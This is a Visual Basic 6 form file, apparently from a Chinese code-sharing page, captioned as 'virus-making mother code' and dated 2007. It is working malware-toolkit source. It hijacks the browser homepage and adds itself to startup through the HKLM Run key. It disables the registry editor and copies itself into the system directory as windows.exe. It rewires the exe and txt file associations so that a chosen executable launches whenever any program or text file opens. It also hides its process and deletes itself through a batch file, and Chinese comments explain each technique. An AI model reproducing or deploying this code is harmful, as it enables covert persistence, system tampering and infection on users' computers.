?? form1.frm
字號:
VERSION 5.00
Begin VB.Form Form1
BorderStyle = 1 'Fixed Single
Caption = "6331905VB制造病毒母代碼"
ClientHeight = 6630
ClientLeft = 45
ClientTop = 435
ClientWidth = 7815
Icon = "Form1.frx":0000
LinkTopic = "Form1"
MaxButton = 0 'False
MinButton = 0 'False
ScaleHeight = 6630
ScaleWidth = 7815
StartUpPosition = 2 '屏幕中心
Begin VB.CommandButton Command14
Caption = "清除感染txt"
Height = 495
Left = 4440
TabIndex = 18
Top = 2880
Width = 975
End
Begin VB.CommandButton Command13
Caption = "清除感染exe"
Height = 495
Left = 4440
TabIndex = 17
Top = 2040
Width = 975
End
Begin VB.PictureBox Picture1
Appearance = 0 'Flat
BackColor = &H80000005&
ForeColor = &H80000008&
Height = 5655
Left = 5640
Picture = "Form1.frx":08FF
ScaleHeight = 5625
ScaleWidth = 1905
TabIndex = 16
Top = 840
Width = 1935
End
Begin VB.CommandButton Command12
Caption = "感染txt文件"
Height = 495
Left = 3120
TabIndex = 15
Top = 2880
Width = 1215
End
Begin VB.CommandButton Command11
Caption = "木馬自刪除"
Height = 495
Left = 3120
TabIndex = 14
Top = 5400
Width = 2295
End
Begin VB.CommandButton Command10
Caption = "隱藏應用程序"
Height = 495
Left = 600
TabIndex = 11
Top = 5400
Width = 1695
End
Begin VB.CommandButton Command9
Caption = "隱藏進程"
Height = 495
Left = 600
TabIndex = 10
Top = 4560
Width = 1695
End
Begin VB.CommandButton Command8
Caption = "修改默認鍵值"
Height = 495
Left = 3120
TabIndex = 8
Top = 4560
Width = 2295
End
Begin VB.CommandButton Command7
Caption = "修改非默認鍵值"
Height = 495
Left = 3120
TabIndex = 7
Top = 3720
Width = 2295
End
Begin VB.CommandButton Command6
Caption = "感染exe文件"
Height = 495
Left = 3120
TabIndex = 6
Top = 2040
Width = 1215
End
Begin VB.CommandButton Command5
Caption = "將程序復制到系統目錄命名為windows.exe并且開機自啟動"
Height = 855
Left = 3120
TabIndex = 5
Top = 840
Width = 2295
End
Begin VB.CommandButton Command4
Caption = "禁止訪問注冊表"
Height = 495
Left = 600
TabIndex = 4
Top = 3720
Width = 1695
End
Begin VB.CommandButton Command3
Caption = "可以訪問注冊表"
Height = 495
Left = 600
TabIndex = 3
Top = 2880
Width = 1695
End
Begin VB.CommandButton Command2
Caption = "開機自啟動"
Height = 495
Left = 600
TabIndex = 2
Top = 2040
Width = 1695
End
Begin VB.TextBox Text1
Appearance = 0 'Flat
Height = 270
Left = 600
TabIndex = 1
Text = "http://www.qq.com"
Top = 840
Width = 1695
End
Begin VB.CommandButton Command1
Caption = "修改主頁"
Height = 495
Left = 600
TabIndex = 0
Top = 1200
Width = 1695
End
Begin VB.Label Label3
Caption = "寫于2007.6.30日"
Height = 255
Left = 720
TabIndex = 13
Top = 6240
Width = 1455
End
Begin VB.Label Label2
Caption = "QQ:6331905"
BeginProperty Font
Name = "宋體"
Size = 18
Charset = 134
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
ForeColor = &H000000FF&
Height = 375
Left = 3240
TabIndex = 12
Top = 6120
Width = 1935
End
Begin VB.Shape Shape1
BorderColor = &H80000000&
Height = 1085
Left = 480
Top = 720
Width = 1940
End
Begin VB.Label Label1
Caption = $"Form1.frx":6100
Height = 615
Left = 360
TabIndex = 9
Top = 120
Width = 7095
End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Option Explicit
Dim systempath As String
Private Sub Command1_Click() '修改主頁
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER, "Software\Microsoft\Internet Explorer\Main", hKey
RegSetValueEx hKey, "Start Page", 0, REG_SZ, ByVal Me.Text1.Text, 30
If Me.Text1.Text = "" Then
RegSetValueEx hKey, "Start Page", 0, REG_SZ, ByVal "about:blank", 30
RegCloseKey hKey
End If
End Sub
Private Sub Command10_Click()
App.TaskVisible = False '隱藏應用程序
End Sub
Private Sub Command11_Click()
Dim s As String
On Error Resume Next
s = CurDir '當前目錄
'保證目錄最后的字符為 "\"
If Right(s, 1) <> "\" Then
s = s & "\"
End If '在當前目錄下創建bat文件
Open s & "kill.bat" For Output As #1
Print #1, ":redel"
Print #1, "del " & Chr(34) & s & App.EXEName & ".exe" & Chr(34)
Print #1, "if exist " & Chr(34) & s & App.EXEName & ".exe" & Chr(34) & " goto redel"
Print #1, "del %0"
Print #1,
Close #1
Shell Chr(34) & s & "kill.bat" & Chr(34)
End
End Sub
Private Sub Command12_Click() '感染txt文件,描述見下面感染exe文件,txt文件默認數據為C:\windows\notepad.exe %1
Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT, "txtfile\shell\open\command\", hKey
RegSetValueEx hKey, "", 0, REG_SZ, ByVal "C:\1.exe", 30
RegCloseKey hKey
Dim a As String
a = Command()
If a = "" Then
Else
Shell a, 1
End If
End Sub
Private Sub Command13_Click() '清除感染exe文件
Dim x As String
x = Chr$(34) + "%1" + Chr$(34) + Chr$(32) + "%*"
Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT, "exefile\shell\open\command\", hKey
RegSetValueEx hKey, "", 0, REG_SZ, ByVal x, 30
RegCloseKey hKey
End Sub
Private Sub Command14_Click() '清除感染txt文件
Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT, "txtfile\shell\open\command\", hKey
RegSetValueEx hKey, "", 0, REG_SZ, ByVal "C:\windows\notepad.exe %1", 30
RegCloseKey hKey
Dim a As String
End Sub
'如果讓程序開機運行,需要先把文件編譯為可執行文件放到特定目錄下,
'并修改注冊表讓其開機便運行,
'路徑是\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVerson\Run
Private Sub Command2_Click() '無論該文件放在什么位置都可以實現開機自啟動
Dim hKey As Long, SubKey As String, Exe As String
SubKey = "Software\Microsoft\Windows\CurrentVersion\Run"
Exe = App.Path & "\" & App.EXEName & ".exe"
RegCreateKey HKEY_LOCAL_MACHINE, SubKey, hKey
RegSetValueEx hKey, "19911593", 0, REG_SZ, ByVal Exe, LenB(StrConv(Exe, vbFromUnicode)) + 1
RegCloseKey hKey
End Sub
'禁止修改注冊表方法為:
'展開注冊表到
'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
'下,新建一個名為DisableRegistryTools的DWORD值,并將其值改為“1”,即可禁止使用注冊表編輯器Regedit,"0"為可用
Private Sub Command3_Click() '可以使用注冊表
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies\System", hKey
RegSetValueEx hKey, "DisableRegistryTools", 0, REG_DWORD, 0&, 4
'0&就是設置DWORD值為0,1&就是設置DWORD值為1
RegCloseKey hKey
End Sub
Private Sub Command4_Click() '禁止使用注冊表
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies\System", hKey
RegSetValueEx hKey, "DisableRegistryTools", 0, REG_DWORD, 1&, 4
RegCloseKey hKey
End Sub
Private Sub Command5_Click() '將程序復制到系統目錄
systempath = String(255, Chr(0))
GetSystemDirectory systempath, 254
systempath = Left(systempath, InStr(systempath, Chr(0)) - 1)
'先檢查系統目錄有無windows.exe文件,如果沒有,自我復制到系統目錄命名為windows.exe
If Not Dir(systempath & "\" & "windows.exe") = "windows.exe" Then
FileCopy App.Path & "\" & App.EXEName & ".exe", systempath & "\" & "windows.exe"
End If
'以下為設置系統目錄的windows.exe為開機自啟動,名稱為6331905,數據為windows.exe
Dim hKey As Long, SubKey As String, Exe As String
SubKey = "Software\Microsoft\Windows\CurrentVersion\Run"
Exe = (systempath & "\" & "windows.exe")
RegCreateKey HKEY_LOCAL_MACHINE, SubKey, hKey
RegSetValueEx hKey, "6331905", 0, REG_SZ, ByVal Exe, LenB(StrConv(Exe, vbFromUnicode)) + 1
RegCloseKey hKey
End Sub
'VB制作EXE文件關聯,并運行指定文件,其實就是修改默認鍵值
'原理: 實現該程序主要是修改注冊表的數據值
'1.在注冊表HKEY_CLASSES_ROOT\exefile\shell\open\command\的默認數據值為"%1" %*
'該"%1" %*默認數據值控制著exe文件的打開
'2.只要修改默認數據值就可以實現文件關聯
'比如,把"%1" %*修改為c:\1.exe %1,請大家在c:\放1個任何1.exe文件,看看運行
'你電腦里面的任何exe程序會發生什么效果
'說明:
'(1) "%1" %*則表示所有EXE文件本身直接運行(EXE 可以直接運行,
'所以用表示程序本身的%1即可),后面的%*則表示程序命令后帶的所有參數
'(這就是為什么EXE文件可以帶參數運行的原因)。
'(2) 1.exe %1,表示將所有文件類型為EXE(exefile表示為EXE類型文件)的
'文件都通過“記事本”程序打開,后面的%1表示要打開的程序本身(就是雙擊時的那個程序)。
Private Sub Command6_Click()
Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT, "exefile\shell\open\command\", hKey
RegSetValueEx hKey, "", 0, REG_SZ, ByVal "c:\1.exe %1", 30
RegCloseKey hKey
Dim a As String '定義一個字符變量,用來存放當前文件的絕對路徑
a = Command() '將絕對路徑存放到變量a中
If a = "" Then '如果a的路徑為空,則什么都不執行
Else '否則執行程序
Shell a, 1 '這是打開變量a指定路徑的文件,運行參數為默認
End If
End Sub
Private Sub Command7_Click() '修改HKEY_CURRENT_USER\Console\FaceNamed的鍵值
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER, "Console\", hKey
RegSetValueEx hKey, "FaceName", 0, REG_SZ, ByVal "16697000", 30
RegCloseKey hKey
End Sub
Private Sub Command8_Click() '修改HKEY_CURRENT_USER\Console的默認鍵值
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER, "Console\", hKey
RegSetValueEx hKey, "", 0, REG_SZ, ByVal "16697000", 30
RegCloseKey hKey
End Sub
Private Sub Command9_Click() '該隱藏進程方法在原版XP2上通過,在雨林木風GHOST版本未通過,有研究的愿意交流
HideCurrentProcess '隱藏進程
End Sub
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -